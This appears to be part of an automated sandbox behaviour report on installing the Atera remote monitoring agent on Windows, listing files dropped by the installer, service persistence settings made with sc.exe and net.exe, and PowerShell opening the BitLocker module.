                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4c.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID178.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADBF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll
                                Source: C:\Windows\System32\msiexec.exe File created: 692c4e.rbf (copy)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe File created: 692c48.rbf (copy)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI422F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIADBF.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA8AC.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5085.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3FBB.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2FBD.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5085.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICBAB.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9409.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI432A.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe File created: C:\Windows\Temp\SplashtopStreamer.exe
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2D79.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5885.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICB4C.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe File created: C:\Windows\Temp\unpack\PreVerCheck.exe
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIAC76.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID178.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI56F2.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI41D1.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICA80.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                Boot Survival

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
